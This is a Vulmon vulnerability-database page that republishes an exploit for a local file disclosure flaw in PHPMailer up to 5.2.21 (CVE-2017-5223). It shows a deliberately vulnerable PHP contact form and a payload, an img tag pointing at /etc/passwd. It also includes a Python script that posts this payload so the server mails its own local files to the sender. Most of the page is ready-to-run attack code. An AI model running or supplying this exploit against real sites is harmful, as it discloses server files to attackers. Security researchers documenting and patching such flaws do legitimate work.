Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

PHPMailer < 5.2.21 - Local File Disclosure

Related Vulnerabilities: CVE-2017-5223  
Publish Date: 25 Oct 2017
Author: Maciek Krupa
Source / Download Exploit 
                							

                # Exploit Title: PHPMailer &lt;= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223

// PoC //

It requires a contact form that sends HTML emails and allows to send a copy to your e-mail

// vulnerable form example //

&lt;?php
require_once('class.phpmailer.php'); // PHPMailer &lt;= 5.2.21
if (isset($_POST['your-name'], $_POST['your-email'], $_POST['your-message'])) {
$mail = new PHPMailer();
$mail-&gt;SetFrom($_POST["your-email"], $_POST["your-name"]);
$address = "admin@localhost";
$mail-&gt;AddAddress($address, "root");
if (isset($_POST['cc'])) $mail-&gt;AddCC($_POST["your-email"], $_POST["your-name"]);
$mail-&gt;Subject = "PHPMailer &lt;= 5.2.21 - Local File Disclosure (CVE-2017-5223)";
$mail-&gt;MsgHTML($_POST["your-message"]);
if(!$mail-&gt;Send()) echo "Error: ".$mail-&gt;ErrorInfo; else echo "Sent!";
}
?&gt;
&lt;form action="/contact.php" method="post"&gt;
&lt;p&gt;&lt;label&gt;Your Name&lt;br /&gt;&lt;input type="text" name="your-name" value="" size="40" /&gt;&lt;/span&gt; &lt;/label&gt;&lt;/p&gt;
&lt;p&gt;&lt;label&gt;Your Email&lt;br /&gt;&lt;input type="email" name="your-email" value="" size="40" /&gt;&lt;/span&gt; &lt;/label&gt;&lt;/p&gt;
&lt;p&gt;&lt;label&gt;Your Message&lt;br /&gt;&lt;textarea name="your-message" cols="40" rows="10"&gt;&lt;/textarea&gt;&lt;/label&gt;&lt;/p&gt;
&lt;p&gt;&lt;input type="checkbox" name="cc" value="yes" /&gt;&lt;span&gt;Send me a copy of this message&lt;/span&gt;
&lt;p&gt;&lt;input type="submit" value="submit" /&gt;&lt;/p&gt;

// exploit //

Put &lt;img src="/etc/passwd"&gt; in the message (or other file to disclose).

// python code //

#!/usr/bin/python
import urllib
import urllib2
 
poc = """
# Exploit Title: PHPMailer &lt;= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
"""
 
url = 'http://localhost/contact.php'
email = 'attacker@localhost'
payload = '&lt;img src="/etc/passwd"'
values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
html = response.read()
print html

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started